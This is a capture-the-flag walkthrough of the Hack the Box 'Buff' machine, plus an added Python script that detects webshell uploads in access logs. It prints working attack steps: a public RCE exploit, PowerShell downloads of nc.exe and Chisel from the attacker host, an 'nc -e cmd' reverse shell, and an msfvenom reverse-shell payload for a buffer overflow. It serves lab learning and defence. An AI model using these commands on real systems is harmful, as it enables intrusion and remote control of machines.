Hack the Box - Buff - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Buff machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Buff machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.70.66.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

sudo nmap -T4 -p- 10.129.70.66  


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -sV -T4 -p8080 10.129.32.56


Let's check out the webservice on port 8080:

http://10.129.70.66:8080/


Taking a quick look at the links on the buttons, it seems like this is a PHP-based website. There's an interesting piece of info on the contact page, though:

http://10.129.70.66:8080/contact.php


If this management software is really at version 1.0, that means there's probably a public exploit out for it. Let's Google it:

Google search string: gym management software 1.0


And let's take a look at this first hit:

https://www.exploit-db.com/exploits/48506


Finding a Way In

This exploit looks like it's uploading webshell code by exploiting the Gym web-app's misconfigured upload.php file. Let's download it and figure out what arguments to pass it:

wget -O gymRCE.py https://www.exploit-db.com/raw/48506
gedit gymRCE.py




This seems like a pretty straightforward script. It creates a webshell on the server, then drops us into the webshell's command line. We just have to provide it with the path to the Gym Management Software installation.

python gymRCE.py http://10.129.70.66:8080/
whoami
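As an added defender's example (my code, not part of the original walkthrough), here is a small Python detection script that scans XAMPP/Apache access log lines for the two-step pattern this exploit leaves behind: a POST to upload.php, then a request for a PHP file served out of the /upload/ directory. The log lines are constructed, and the endpoint and directory names are assumed from the paths seen in this walkthrough.

```python
import re
from collections import defaultdict

# Apache "combined" log format as written by XAMPP; the request line is split
# into method and path so the path can be inspected on its own.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Assumed from this walkthrough's paths (upload.php, htdocs\gym\upload).
UPLOAD_ENDPOINT = "/upload.php"
UPLOAD_DIR = "/upload/"

# A PHP extension anywhere in the name counts, not just at the end: loosely
# configured Apache handlers can execute "avatar.php.png" as PHP.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

def parse_line(line):
    """Return {ip, method, path, status} for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec

def detect_upload_webshell(lines):
    """Flag requests for script-like files under the upload directory and note
    whether the same client POSTed to the upload endpoint earlier in the log."""
    alerts, posts_by_ip = [], defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT:
            posts_by_ip[rec["ip"]] += 1
        elif rec["path"].startswith(UPLOAD_DIR) and \
                SCRIPT_EXT_RE.search(rec["path"][len(UPLOAD_DIR):]):
            alerts.append({"ip": rec["ip"], "path": rec["path"],
                           "status": int(rec["status"]),
                           "prior_upload": posts_by_ip[rec["ip"]] > 0})
    return alerts

# Constructed sample log lines, not real traffic from the machine.
SAMPLE_LOG = [
    '10.10.14.84 - - [24/Aug/2021:10:01:40 +0000] "POST /upload.php?id=avatar HTTP/1.1" 200 15 "-" "python-requests/2.25.1"',
    '10.10.14.84 - - [24/Aug/2021:10:01:41 +0000] "GET /upload/avatar.php.png?cmd=whoami HTTP/1.1" 200 44 "-" "python-requests/2.25.1"',
    '10.10.14.99 - - [24/Aug/2021:10:05:00 +0000] "GET /upload/photo.png HTTP/1.1" 200 8011 "-" "Mozilla/5.0"',
    '10.10.14.99 - - [24/Aug/2021:10:05:30 +0000] "GET /upload/old.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]
```

Running detect_upload_webshell over a real access.log flags the webshell fetch with prior_upload set, while a stray 404 for an old .php file under /upload/ is still reported but without the matching POST.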


Capturing the User Flag

We'll take this opportunity to capture the User flag for this system. Hack the Box Windows system User flags are usually located in a user's \Desktop directory:

type c:\users\shaun\desktop\user.txt


Before we continue, we should probably get ourselves a better shell. This webshell, while functional, has a few limitations, so let's upload a Netcat binary to the target and execute it to get ourselves a proper reverse shell.

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe nc.exe 


And the last thing to do before our upload is to set up an HTTP server using Python:

sudo python -m SimpleHTTPServer 80


Now we can use a PowerShell command from the webshell to download the Netcat binary.

powershell -c iwr http://10.10.14.84/nc.exe -outf c:\xampp\htdocs\gym\upload\nc.exe
dir



Now to start a Netcat listener on our attacking system, then run Netcat from the Windows host to open our reverse shell:

sudo nc -nlvp 443

nc -e cmd 10.10.99.99 443




Foothold Enumeration

While enumerating the system, we find an interesting binary in the shaun user's \Desktop directory.


We check to see if this software is running:

tasklist | findstr -i CloudMe


We do a quick Searchsploit on this software:

searchsploit cloudme


This exploit matches the version we saw in the \Desktop directory. Let's take a look at it:

searchsploit -x 48389




So we see that this is a buffer overflow exploit: it targets the exact version of the software we suspect is running on the system, it's a local exploit that targets the service on port 8888, and it uses an Msfvenom-generated payload. Before we continue, let's make sure there's a service listening on the Windows host's local port 8888:

netstat -ano | findstr -i listen


From what we know, the exploit is local, meaning we would have to use Python to run it on the Windows system, but the victim Windows system doesn't have Python installed. This isn't a problem, because we can use port forwarding to connect the Windows host's local port 8888 to our attacking machine's local port 8888. We want the exploit to open a reverse shell to our attacking system, so we'll need to start another Netcat listener on our attacking system. We also need to generate our own payload for the exploit using Msfvenom, then use that payload to modify the exploit script. Let's start by copying the exploit script to our working directory, then renaming it for clarity:

searchsploit -m 48389
mv 48389.py HTBbuffBOF.py


Now to set up port forwarding between our attacking machine and the Windows machine. We'll use a program called Chisel to do this. Chisel can be found at the following URL:

https://github.com/jpillora/chisel/

We install Chisel to our Kali system with the following command (after switching to the root user):

curl https://i.jpillora.com/chisel! | bash


The other part of using Chisel involves transferring a Chisel binary to the Windows machine. First, we download the latest Chisel binary to our attacking system, then unzip the file and rename it:

wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_amd64.gz
gunzip chisel_1.7.6_windows_amd64.gz
mv chisel_1.7.6_windows_amd64 chisel.exe




Now we download the Chisel binary from our Windows host:

powershell -c iwr http://10.10.14.84/chisel.exe -outf c:\users\shaun\downloads\chisel.exe
dir


Now to start up our Chisel server from our Kali system:

chisel server -p 9000 --reverse


Now our Chisel server is listening on port 9000 and is waiting for incoming connections. To complete the connection, we run the Chisel client from the Windows system:

start chisel client 10.10.14.84:9000 R:8888:127.0.0.1:8888



Now our Chisel connection has been established, linking Kali's local port 8888 to the Windows local port 8888. Next we start up our new Netcat listener on our Kali machine:

sudo nc -nlvp 8080


We now generate the buffer overflow payload code using Msfvenom:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.99.99 LPORT=8080 -b '\x00\x0A\x0D' -f python


And now to modify our exploit:

gedit HTBbuffBOF.py


We replace the payload portion of the exploit with the output of the Msfvenom command. Unfortunately, this turns the script's payload variable into a variable named buf, and a variable named buf already exists on Line 52. So we add an extra f to rename the Line 52 variable to buff, replace each instance of the word payload (on lines 50 and 52) with buf, then replace buf on Line 57 with buff. Our exploit script is then ready to go.

python HTBbuffBOF.py
whoami



Capturing the Root Flag

Root flags on Hack the Box Windows systems are usually located in the Administrator user's \Desktop directory:

type c:\users\administrator\desktop\root.txt


Summary

After initial scans, we found that the target system was running an insecure web app on its website, leading to remote code execution through a misconfigured file upload function and a foothold shell on the target. Enumeration of the system revealed that a vulnerable service was running. We found a public exploit for this service and executed it, which triggered a buffer overflow in the vulnerable service and opened a reverse shell to our attacking system with elevated privileges, through which we captured our objective flag file.

Finish
